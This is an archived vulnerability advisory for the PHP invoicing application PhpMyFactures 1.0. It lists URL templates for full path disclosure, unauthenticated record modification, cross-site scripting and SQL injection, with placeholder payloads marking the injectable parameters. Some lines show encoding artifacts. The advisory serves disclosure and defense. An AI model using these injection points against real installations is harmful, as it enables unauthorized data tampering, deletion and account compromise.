TUCoPS :: Web :: PHP :: b06-2987.htm

PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path Disclosure and others
PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path Disclosure and others
PhpMyFactures 1.0 Cross Site Scripting, SQL Injection, Full Path Disclosure and others


PhpMyFactures 1.0=0D
*****************=0D
=0D
Full Path Disclosure=0D
********************   =0D
[Guest] http://[...]/verif.php=0D 
[Guest] http://[...]/inc/footer.php=0D 
[Guest] http://[...]/remises/ajouter_remise.php=0D 
=0D
Informations modification=0D
*************************   =0D
[Guest] http://[...]/tva/ajouter_tva.php?action=send&tva=[DIGITS]=0D 
[Guest] http://[...]/remises/ajouter_remise.php?action=send&titre=[TITLE]&taux=[DIGITS]=0D 
[Guest] http://[...]/pays/ajouter_pays.php?pays=[COUNTRY]&prefixe=[PHONE_PREFIX]=0D 
[Guest] http://[...]/pays/modifier_pays.php?pays=[COUNTRY]&prefixe=[PHONE_PREFIX]&id_pays=[COUNTRY_ID]=0D 
[Guest] http://[...]/produits/ajouter_cat.php?titre=[TITLE]=0D 
[Guest] http://[...]/produits/ajouter_produit.php?action=send&titre=[TITLE]&description=[DESCRIPTION]&priv_vente_ht=[PRICE]&id_taux_tva=[DIGITS]&stock=[DIGIT]=0D 
[Guest] http://[...]/produits/modifier_cat.php?action=send&id_cat=[ID]&titre=[TITLE]=0D 
[Guest] http://[...]/clients/ajouter_client.php?action=send&nom=[NAME]&prenom=[SURNAME]&societe=[ENTERPRISE]&adresse=[ADRESS]&adresse2=[ADRESS2]&ville=[CITY]&code_postal=[DIGIT]&telephone=[PHONE]&fax=[FAX]&portable=[PHONE]&email=[EMAIL]=0D 
[Guest] http://[...]/clients/modifier_client.php?action=send&id_client=[ID]&nom=[NAME]&prenom=[SURNAME]&societe=[ENTERPRISE]&adresse=[ADRESS]&adresse2=[ADRESS2]&ville=[CITY]&code_postal=[DIGIT]&telephone=[PHONE]&fax=[FAX]&portable=[PHONE]&email=[EMAIL]=0D 
=0D
Cross Site Scripting =0D
********************   =0D
[Guest] [XSS]=0D">http://[...]/inc/header.php?prefixe_dossier=">[XSS]=0D 
[Admin] [XSS]=0D">http://[...]/remises/ajouter_remise.php?msg=">[XSS]=0D 
[Admin] [XSS]=0D">http://[...]/remises/ajouter_remise.php?tire=">[XSS]=0D 
[Admin] [XSS]=0D">http://[...]/tva/ajouter_tva.php?msg=">[XSS]=0D 
[Admin] [XSS]&taux=">[XSS]&date=">[XSS]=0D">http://[...]/stocks/ajouter.php?id_produit=1&msg=[XSS]&quantite=">[XSS]&taux=">[XSS]&date=">[XSS]=0D 
[Admin] [XSS]&prefixe=">[XSS]=0D">http://[...]/pays/ajouter_pays.php?msg=[XSS]&pays=">[XSS]&prefixe=">[XSS]=0D 
[Admin] http://[...]/produits/ajouter_cat.php?msg=[XSS]=0D 
[Admin] http://[...]/produits/ajouter_produit.php?msg=[XSS]=0D 
[Admin] http://[...]/produits/modifier_cat.php?msg=[XSS]=0D 
=0D
SQL Injection =0D
*************   =0D
[Admin] http://[...]/remises/index.php?action=delete&id_remise=1"[SQL_DELETE]=0D 
[Admin] http://[...]/tva/index.php?action=delete&id_taux=1"[SQL_SELECT]=0D 
[Admin] http://[...]/stocks/index.php?action=delete&ref_produit=1"[SQL_SELECT]&id_stock=1"[SQL_DELETE]&ref_produit=1"[SQL_SELECT]=0D 
[Admin] http://[...]/pays/index.php?action=delete&id_pays=1"[SQL_SELECT]=0D 
[Admin] http://[...]/produits/index.php?action=delete&id_cat=1[SQL_DELETE]=0D 
[Guest] http://[...]/pays/modifier_pays.php?action=send&id_pays=1"[SQL_SELECT/UPDATE]=0D 
[Guest] http://[...]/produits/ajouter_cat.php?titre=[SQL_INSERT]=0D 
[Guest] http://[...]/stocks/ajouter.php?id_produit=1"[SQL_SELECT]&quantite=[SQL_INSERT]&prix_ht=[SQL_INSERT]&date=[SQL_INSERT]=0D 
[Guest] http://[...]/produits/modifier_cat.php?id_cat="[SQL_SELECT]=0D 
[Guest] http://[...]/clients/modifier_client.php?id_client=1"[SQL_SELECT]=0D 
=0D
Credits=0D
*******=0D
by DarkFig - http://www.acid-root.new.fr/advisories/phpmyfactures.txt

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH